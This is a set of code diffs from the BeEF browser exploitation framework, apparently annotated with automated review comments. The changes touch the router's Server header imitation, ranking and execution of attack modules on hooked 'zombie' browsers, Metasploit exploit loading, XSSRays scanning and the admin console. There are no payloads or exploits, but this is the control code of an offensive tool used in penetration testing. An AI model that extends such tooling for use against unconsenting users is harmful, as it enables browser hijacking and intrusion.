# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Router
#@note This is the main Router parent class.
#@note All the HTTP handlers registered on BeEF will extend this class.
class Router < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found' end
before do
# @note Override Server HTTP response header
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)"
#todo https://github.com/beefproject/beef/issues/98 if web_server imitation is enabled
#todo the 404 response will be something like the following:
#<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
#<html><head>
#<title>404 Not Found</title>
#</head><body>
#<h1>Not Found</h1>
#<p>The requested URL /aaaa was not found on this server.</p>
# <hr>
# <address>Apache/2.2.3 (CentOS)</address>
# </body></html>
when "iis"
headers "Server" => "Microsoft-IIS/7.0"
end
end
end
end
end
end
end
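Review bot: the `case type` has no `else`, so a typo in `beef.http.web_server_imitation.type` silently leaves the default Sinatra `Server` header in place; log the unsupported value with `print_error`. The imitation also only rewrites `Server`: the `not_found` body `'Not Found'`, the 404 body shape the `#todo` already points at, and the other default framework headers still identify the real stack, so the config.yaml option should describe this as a header-level imitation only. The `config` local captured by the `before` block is fine as a closure, but since every handler is meant to extend this class, the lookup runs on every request for every route; that is acceptable, just worth a comment.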

View File

@@ -67,11 +67,6 @@ module BeEF
if class_symbol and class_symbol.respond_to?(:options)
return class_symbol.options
end
#TODO: do we really need to print this info? At then modules with no options are common,
# so I guess we shouldn't print this info even in debug mode
# else
# print_debug "Module '#{mod}', no options method defined"
# end
end
return []
end
@@ -208,10 +203,13 @@ module BeEF
case v
when String
if opts['browser'] == v
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
results << {'rating' => 2, 'const' => k}
end
when Hash
if opts['browser'] == v.keys.first
if opts['browser'] == v.keys.first or v.keys.first == BeEF::Core::Constants::Browsers::ALL
subv = v[v.keys.first]
rating = 1
#version check
@@ -241,14 +239,15 @@ module BeEF
rating += 1
match = true
elsif subv['os'] == BeEF::Core::Constants::Os::OS_ALL_UA_STR
rating += 1
match = true
end
when Array
subv['os'].each{|p|
if o == p or p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
if o == p
rating += 1
match = true
elsif p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
match = true
end
}
end
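Review bot: the Array branch now sets `match = true` without `rating += 1` when the module's os entry is `OS_ALL_UA_STR`, but the String branch just above (`elsif subv['os'] == BeEF::Core::Constants::Os::OS_ALL_UA_STR` followed by `rating += 1`) still increments for the same wildcard; a module that lists `OS_ALL_UA_STR` as a single string therefore outranks one that lists it inside an array, for identical declared support. Apply the same rule in both branches.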
@@ -257,18 +256,35 @@ module BeEF
break
end
end
if rating != 1
if rating > 0
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
results << {'rating' => rating, 'const' => k}
end
end
end
if v == BeEF::Core::Constants::Browsers::ALL
results << {'rating' => 1, 'const' => k}
rating = 1
if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
rating = 1
end
results << {'rating' => rating, 'const' => k}
end
}
}
if results.count > 0
return results.sort_by {|v| v['rating']}.last['const']
result = {}
results.each {|r|
if result == {}
result = {'rating' => r['rating'], 'const' => r['const']}
else
if r['rating'] > result['rating']
result = {'rating' => r['rating'], 'const' => r['const']}
end
end
}
return result['const']
else
return BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN
end
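Review bot: the block `if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING` / `rating = 1` assigns the value `rating` already holds, so it changes nothing; if the intent is that an explicit "not working" entry should win over (or lose to) a generic `Browsers::ALL` match, give it a distinct rating. The manual loop replacing `sort_by {...}.last` is simply `results.max_by { |r| r['rating'] }['const']`, but note that tie-breaking changed: this loop (via `>`) keeps the first entry with the top rating, whereas `sort_by.last` returned one of the last, so when a browser appears under two constants with equal rating (for example `VERIFIED_NOT_WORKING` and another verification constant) the outcome now depends on iteration order of the targets hash. Since this decides whether a module is shown as working, make the precedence explicit.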
@@ -413,22 +429,22 @@ module BeEF
# @param [String] mod module key
# @param [String] hbsession hooked browser session
# @param [Array] opts array of module execute options (see #get_options)
# @return [Boolean] whether or not the BeEF system executed the module
# @return [Fixnum] the command_id associated to the module execution when info is persisted. nil if there are errors.
# @note The return value of this function does not specify if the module was successful, only that it was executed within the framework
def self.execute(mod, hbsession, opts=[])
if not (self.is_present(mod) and self.is_enabled(mod))
print_error "Module not found '#{mod}'. Failed to execute module."
return false
return nil
end
if BeEF::API::Registrar.instance.matched?(BeEF::API::Module, 'override_execute', [mod, nil,nil])
BeEF::API::Registrar.instance.fire(BeEF::API::Module, 'override_execute', mod, hbsession,opts)
# @note We return true by default as we cannot determine the correct status if multiple API hooks have been called
return true
# @note We return not_nil by default as we cannot determine the correct status if multiple API hooks have been called
return 'not_available' # @note using metasploit, we cannot know if the module execution was successful or not
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
return nil
end
self.check_hard_load(mod)
command_module = self.get_definition(mod).new(mod)
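Review bot: `execute` now returns three different kinds of value: a command id, the String `'not_available'` when an `override_execute` hook (Metasploit) handled the module, and `nil` on error, but the `@return [Fixnum]` doc only covers the first; document the `'not_available'` case, since callers test `!= nil` and then interpolate the value into JSON as a command id (the `Modules` REST handler and the AdminUI `Modules` controller in this compare). A symbol (`:not_available`) or a named constant would also be harder to confuse with a legitimately serialised id than a bare string.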
@@ -436,12 +452,12 @@ module BeEF
command_module.pre_execute
end
h = self.merge_options(mod, [])
c = BeEF::Core::Models::Command.new(:data => self.merge_options(mod, opts).to_json,
c = BeEF::Core::Models::Command.create(:data => self.merge_options(mod, opts).to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
return true
)
return c.id
end
# Merges default module options with array of custom options
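Review bot: `BeEF::Core::Models::Command.create(...)` returns the resource whether or not it was saved (DataMapper does not raise on a failed save), so `c.id` can be `nil` here and the caller cannot distinguish that from the "module not found" error path; check `c.saved?` and log before returning. `h = self.merge_options(mod, [])` on the line above is computed and never used, and `merge_options(mod, opts)` is then computed again inside the `create` call.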

View File

@@ -15,20 +15,20 @@
#
class Hash
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
end
end
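Review bot: the `@note` states that duplicate keys are overwritten by the value in the hash calling `deep_merge` (not the parameter hash), but the code does `target[key] = hash[key]` for every non-Hash conflict, so the parameter hash wins. The callers rely on the actual behaviour (`y.deep_merge(@config)` in `load_extensions_config`, so that the main `config.yaml` overrides an extension's defaults), so fix the comment rather than the code. The hunk itself is indentation-only and could have been left out of this change.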

View File

@@ -21,7 +21,7 @@ class Module
classes = []
ObjectSpace.each_object(Class) { |k| classes << k if k.included_modules.include?(self) }
classes.reverse.inject([]) do |unique_classes, klass|
classes.reverse.inject([]) do |unique_classes, klass|
unique_classes << klass unless unique_classes.collect { |k| k.to_s }.include?(klass.to_s)
unique_classes
end
@@ -32,26 +32,8 @@ class Module
def included_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.included_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end
end
# Returns the modules extended inside the target module
# @return [Array] Array of modules
def extended_modules
(class << self; self end).included_modules
end
# Returns the modules extending the target module
# @return [Array] Array of modules
def extended_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.extended_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end

View File

@@ -14,35 +14,35 @@
# limitations under the License.
#
class Object
# Returns true if the object is a Boolean
# @return [Boolean] Whether the object is boolean
def boolean?
self.is_a?(TrueClass) || self.is_a?(FalseClass)
self.is_a?(TrueClass) || self.is_a?(FalseClass)
end
# Returns true if the object is a String
# @return [Boolean] Whether the object is a string
def string?
self.is_a?(String)
end
# Returns true if the object is an Integer
# @return [Boolean] Whether the object is an integer
def integer?
self.is_a?(Integer)
end
# Returns true if the object is a hash
# @return [Boolean] Whether the object is a hash
def hash?
self.is_a?(Hash)
end
# Returns true if the object is a class
# @return [Boolean] Whether the object is a class
def class?
self.is_a?(Class)
end
end

View File

@@ -55,27 +55,27 @@ module DataMapper
def normalized_uri
@normalized_uri ||=
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
end
end

View File

@@ -29,12 +29,11 @@ end
# Function used to print debug information
# @param [String] s String to be printed
# @note This function will only print messages if the debug flag is set to true
# @todo Once the console extension has been merged into the core, remove the extension checks.
def print_debug(s)
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || BeEF::Core::Console::CommandLine.parse[:verbose]
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
end
# Function used to print successes to the console
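Review bot: `print_debug` now depends on both `BeEF::Core::Configuration.instance` and `BeEF::Core::Console::CommandLine.parse`, so it can only be called once configuration has been constructed; with the hand-rolled singleton in this compare, `Configuration.instance` raises `NameError` (`@@instance` unset) when called earlier, and `Configuration#initialize` itself calls `print_debug e` in its rescue branch before `@@instance` is assigned. Guard the lookup (a `defined?(@@instance)` check inside `instance`, or a fallback to the `:verbose` flag alone) so a broken config file produces the intended "Fatal Error" message instead of a second exception.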
@@ -49,14 +48,14 @@ end
def print_more(s)
time = Time.now.localtime.strftime("[%k:%M:%S]")
lines = s.split("\n")
lines.each_with_index do |line, index|
lines.each_with_index do |line, index|
if ((index+1) == lines.size)
puts "#{time} |_ #{line}"
else
puts "#{time} | #{line}"
end
end
end
end
# Function used to print over the current line

View File

@@ -18,5 +18,5 @@ class String
# @note Use a gem to colorize the console.
# @note http://flori.github.com/term-ansicolor/
include Term::ANSIColor
end

View File

@@ -208,36 +208,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(zombie_session, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(zombie_session, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(zombie_session, 'SystemPlatform')
if not system_platform.nil?
@@ -636,7 +606,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
def2.push({'name' => k, 'value' => v})
}
# End hack
@body = (BeEF::Module.execute(mod_key, zombie_session, def2)) ? '{success: true}' : '{success: false}'
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = (exec_results != nil) ? '{success: true}' : '{success: false}'
end
# Re-execute an command_module to a zombie.
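Review bot: with `execute` now returning `'not_available'` for override-handled modules, `exec_results != nil` treats that case as success, consistent with the REST handler; but the body `'{success: true}'` is not valid JSON (unquoted key). If the ExtJS client only `eval`s the response this works, but `{'success' => true}.to_json` would be the safer form and consistent with the REST API added in this compare.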

View File

@@ -80,7 +80,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
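Review bot: the reworded log line still omits the scan id even though `xssrays_scan.save` runs immediately before it, so `xssrays_scan.id` is available; the receive-ray message elsewhere in this change set already prints `Scan id [#{xssrays_scan.id}]`, and printing it here too lets the start and ray lines be correlated. The identical string is also edited in the hunk at line 116 of this controller, so a small helper would avoid maintaining two copies.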
@@ -116,7 +116,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
end
@@ -124,4 +124,4 @@ end
end
end
end
end
end

@@ -21,27 +21,25 @@ ZombieTab = function(zombie) {
requester_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
//-------------------------------------------
ZombieTab.superclass.constructor.call(this, {
id: zombie.session,
id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
title: zombie.ip,
title: "Current Browser",
autoScroll: true,
closable: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab]
});
};
Ext.extend(ZombieTab, Ext.TabPanel, {
listeners: {
close: function(panel) {
panel.destroy();
}
activate: function(panel) {},
deactivate: function(panel) {},
close: function(panel) {}
}
});
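Review bot: replacing `title: zombie.ip` with the fixed string "Current Browser" removes the only place the tab showed which hooked browser it belongs to, which matters more now that a single tab with id `current-browser` is reused for every selection; consider `title: 'Current Browser (' + zombie.ip + ')'`. The `activate`, `deactivate` and `close` listeners are all empty and can be deleted; the old `close` handler's `panel.destroy()` is no longer needed only because the tab is `closable: false` and is removed by the tree click handler instead, which deserves a comment here.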

@@ -132,7 +132,7 @@ function get_dynamic_payload_details(payload, zombie) {
generate_form_input_field(Ext.getCmp("payload-panel"), input, null, false, zombie);
});
Ext.getCmp("payload-panel").doLayout();
Ext.getCmp("payload-panel").doLayout();
}
})
}
@@ -145,7 +145,7 @@ function get_dynamic_payload_details(payload, zombie) {
* @param: {Object} the targeted Zombie.
* @param: {Object} the status bar.
*/
function genExisingExploitPanel(panel, command_id, zombie, sb) {
function genExistingExploitPanel(panel, command_id, zombie, sb) {
if(typeof panel != 'object') {
Ext.beef.msg('Bad!', 'Incorrect panel chosen.');
return;
@@ -304,7 +304,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
var xgrid = Ext.getCmp('command-module-grid-zombie-'+zombie.session);
var sb = Ext.getCmp('commands-bbar-zombie-'+zombie.session);
panel.removeAll();
if(command_module_name == 'some special command module') {
//HERE we will develop specific panels for the command modules that require it.
} else {
@@ -327,9 +327,8 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
}
module = module.command_modules[1];
panel.removeAll();
var form = new Ext.form.FormPanel({
var form = new Ext.form.FormPanel({
url: submiturl,
id: 'form-command-module-zombie-'+zombie.session,
@@ -394,7 +393,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
bodyBorder: false,
height: 200,
hidden: true,
border: false //we can remove the border of the panel
border: false //we can remove the border of the panel
});
Ext.each(module.Data, function(input){
@@ -402,7 +401,6 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
);
form.add(payload_panel);
panel.add(form);
panel.doLayout();
// hide the load mask after rendering of the config panel is done

@@ -77,7 +77,7 @@ ZombieTab_Commands = function(zombie) {
if(!command_id) return;
genExisingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
genExistingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
});
LoadCommandPanelEvent = function(node,keyclick) {
@@ -95,7 +95,7 @@ ZombieTab_Commands = function(zombie) {
nonce: Ext.get ("nonce").dom.value
}
});
genNewExploitPanel(command_module_config, node.id, node.text, zombie, commands_statusbar);
commands_statusbar.showValid('Ready');
}
@@ -139,16 +139,12 @@ ZombieTab_Commands = function(zombie) {
'afterrender' : function() {
},
'selectionchange' : function() {
console.log("selection changed");
},
'activate' : function() {
console.log("activate");
},
'select' : function() {
console.log("select");
},
'keyup' : function() {
console.log("Key up");
},
'render' : function(c) {
c.getEl().on('keyup', function() {
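Review bot: removing the `console.log` calls is right (in IE `window.console` does not exist while the developer tools are closed, so these calls throw and break the admin UI), but the `selectionchange`, `activate`, `select` and `keyup` listeners left behind are now empty functions and should be dropped as well.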
@@ -189,4 +185,8 @@ ZombieTab_Commands = function(zombie) {
var sb = Ext.getCmp('command-module-bbar-zombie-'+zombie.session);
};
Ext.extend(ZombieTab_Commands, Ext.Panel, {});
Ext.extend(ZombieTab_Commands, Ext.Panel, {
listeners: {
close: function(panel) {}
}
});
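Review bot: the `close` listener added to `Ext.extend(ZombieTab_Commands, ...)` is an empty function, so this only replaces `{}` with a no-op; either remove it or implement the cleanup it is meant to perform.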

@@ -102,8 +102,6 @@ ZombieTab_Requester = function(zombie) {
// itemclick: function(item) {
// switch (item.id) {
// case 'do-something':
// console.log("history_panel_context_menu.rowIndex: " + history_panel_context_menu.rowIndex);
// console.log("history_panel_context_menu.dbIndex: " + history_panel_context_menu.dbIndex);
// break;
// }
// }

@@ -113,12 +113,13 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new hooked browser tab when a hooked browser is clicked
click: function(node, e) {
if(!node.leaf) return;
if(!mainPanel.get(node.attributes.session)) {
mainPanel.remove(mainPanel.getComponent('current-browser'));
if(!mainPanel.getComponent('current-browser')) {
mainPanel.add(new ZombieTab(node.attributes));
}
mainPanel.activate(node.attributes.session);
mainPanel.activate(mainPanel.getComponent('current-browser'));
},
//show the context menu when a HB is right-clicked
contextmenu: function(node, event){
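Review bot: `mainPanel.remove(mainPanel.getComponent('current-browser'))` runs unconditionally, so the following `if(!mainPanel.getComponent('current-browser'))` is always true and can be dropped; conversely, on the first click there is no such component yet and `remove` is called with `undefined`, which should be guarded, e.g. `var cur = mainPanel.getComponent('current-browser'); if (cur) mainPanel.remove(cur);`. Note also that clicking the already-selected browser now destroys and rebuilds the whole tab, discarding any unsent form input in the commands panel.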

@@ -24,39 +24,8 @@ module Console
#
@short_name = @full_name = 'console'
@description = 'console environment to manage beef'
#
# Returns true of the verbose option has been enabled for the console.
# False if not.
#
# Example:
#
# $ ruby console.rb -v
# BeEF::Extension::Console.verbose? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.verbose? # => false
#
def self.verbose?
CommandLine.parse[:verbose]
end
#
# Returns true if we should reset the database. False if not.
#
# $ ruby console.rb -x
# BeEF::Extension::Console.resetdb? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.resetdb? # => false
#
def self.resetdb?
CommandLine.parse[:resetdb]
end
end
end
end
require 'extensions/console/banners'
require 'extensions/console/commandline'
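Review bot: with `verbose?` and `resetdb?` removed from `BeEF::Extension::Console`, every caller has to move to `BeEF::Core::Console::CommandLine.parse[...]`; the Metasploit hook hunk in this change set does so for `:resetdb` and the QR code extension moves to `BeEF::Core::Console::Banners`, but nothing here shows a caller of `verbose?` being updated, so grep for `Console.verbose?` before merging. If the two `require 'extensions/console/...'` lines survive this hunk they should point at wherever `banners.rb` and `commandline.rb` now live under core.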

@@ -56,7 +56,7 @@ class Command
print_line("Module parameters:")
driver.interface.cmd['Data'].each{|data|
print_line(data['name'] + " => \"" + data['value'] + "\" # this is the " + data['ui_label'] + " parameter")
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter")
} if not driver.interface.cmd['Data'].nil?
end
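Review bot: `data['value'].to_s` fixes the TypeError for non-string values, but `data['name']` and `data['ui_label']` are concatenated on the same line and will raise if either is nil; use interpolation for the whole line, e.g. `print_line("#{data['name']} => \"#{data['value']}\" # this is the #{data['ui_label']} parameter")`.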
@@ -153,7 +153,9 @@ class Command
print_line("Results retrieved: " + Time.at(output[0]['date'].to_i).to_s)
print_line("")
print_line("Response:")
print_line(output[0]['data']['data'].to_s)
output.each do |op|
print_line(op['data']['data'].to_s)
end
end
end
end
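Review bot: the loop now prints every entry of `output`, but the "Results retrieved:" timestamp above it still comes from `output[0]['date']` only; each result carries its own date, so either move the date into the loop (`print_line("Results retrieved: " + Time.at(op['date'].to_i).to_s)` before each response) or state that the timestamp belongs to the first result.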

@@ -31,6 +31,7 @@ class Core
"back" => "Move back from the current context",
"exit" => "Exit the console",
"help" => "Help menu",
"irb" => "Drops into an interactive Ruby environment",
"jobs" => "Print jobs",
"online" => "List online hooked browsers",
"offline" => "List previously hooked browsers",
@@ -236,6 +237,28 @@ class Core
print_status("Target a particular online, hooked browser")
print_status(" Usage: target <id>")
end
def cmd_irb(*args)
@@bare_opts.parse(args) {|opt, idx, val|
case opt
when "-h"
cmd_irb_help
return false
end
}
print_status("Starting IRB shell...\n")
begin
Rex::Ui::Text::IrbShell.new(binding).run
rescue
print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}")
end
end
def cmd_irb_help(*args)
print_status("Load the IRB, Interative Ruby Shell")
end
def cmd_review(*args)
@@bare_opts.parse(args) {|opt, idx, val|

@@ -195,7 +195,7 @@ class ShellInterface
def2.push({'name' => k, 'value' => v})
}
# End hack
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) == true
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) != nil
return true
else
return false
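Review bot: `!= nil` treats a `false` return from `BeEF::Module.execute` as success; the Metasploit `override_execute` in this change set returns `false` when the hooked browser cannot be found, so that path will now be reported as executed. The AdminUI Modules controller makes the same change, and both call sites should agree on whether nil or false is the failure value; if it is nil only, the previous `== true` could simply become a truthiness test.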
@@ -417,21 +417,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(self.targetsession, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(self.targetsession, 'SystemPlatform')
if not system_platform.nil?
@@ -447,21 +432,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(self.targetsession, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_params = BD.get(self.targetsession, 'ScreenParams')
if not screen_params.nil?

Binary file not shown.

Binary file not shown.

@@ -0,0 +1,19 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class checkJava extends Applet{
public static int results = 0;
public void init() {
}
public int getInfo() {
results = 1;
return results;
}
}
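Review bot: `java.io`, `java.util` and `java.net` are imported but unused in `checkJava`, and the `public static int results` field exists only so `getInfo()` can set it to 1 and return it; since the applet's sole purpose is to signal that it ran, `getInfo()` returning a constant is enough. Trimming the unused imports also narrows what a reader has to check before trusting the compiled class that ships alongside this source.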

@@ -81,7 +81,6 @@ module BeEF
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
# get and store browser name
browser_name = get_param(@data['results'], 'BrowserName')
if BeEF::Filters.is_valid_browsername?(browser_name)
@@ -170,22 +169,6 @@ module BeEF
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
end
# get and store the internal ip address
internal_ip = get_param(@data['results'], 'InternalIP')
if BeEF::Filters.is_valid_ip?(internal_ip)
BD.set(session_id, 'InternalIP', internal_ip)
else
self.err_msg "Invalid internal IP address returned from the hook browser's initial connection."
end
# get and store the internal hostname
internal_hostname = get_param(@data['results'], 'InternalHostname')
if BeEF::Filters.is_valid_hostname?(host_name)
BD.set(session_id, 'InternalHostname', internal_hostname)
else
self.err_msg "Invalid internal hostname returned from the hook browser's initial connection."
end
# get and store the hooked browser type
browser_type = get_param(@data['results'], 'BrowserType')
if BeEF::Filters.is_valid_browsertype?(browser_type)
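Review bot: the removed block validated the wrong variable: `BeEF::Filters.is_valid_hostname?(host_name)` was checked while `internal_hostname` was stored, so the hostname was only ever saved when an unrelated `host_name` happened to validate. Deleting the block makes that moot; if internal hostname collection is reintroduced as a command module, make sure the value that is validated is the value that is stored.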
@@ -274,6 +257,10 @@ module BeEF
self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection."
end
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
# Call autorun modules
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
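Review bot: the new `print_info` line interpolates `browser_name`, `browser_version`, `os_name` and `log_zombie_domain`, all of which originate in the hooked browser's initial request; `browser_name` is shown being checked with `BeEF::Filters.is_valid_browsername?` above, and the other fields should have passed equivalent filters before they reach this line, so that a hostile page cannot push terminal control sequences into the operator's console.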

@@ -14,166 +14,166 @@
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
module API
module Extension
module Metasploit
module API
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Extension::Console.resetdb? and File.exists?("#{path}msf-exploits.cache")
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Core::Console::CommandLine.parse[:resetdb] and File.exists?("#{path}msf-exploits.cache")
print_debug "Attempting to use Metasploit exploits cache file"
raw = File.read("#{path}msf-exploits.cache")
begin
msf_module_config = YAML.load(raw)
msf_module_config = YAML.load(raw)
rescue => e
puts e
puts e
end
count = 1
msf_module_config.each{|k,v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
msf_module_config.each { |k, v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k, nil])
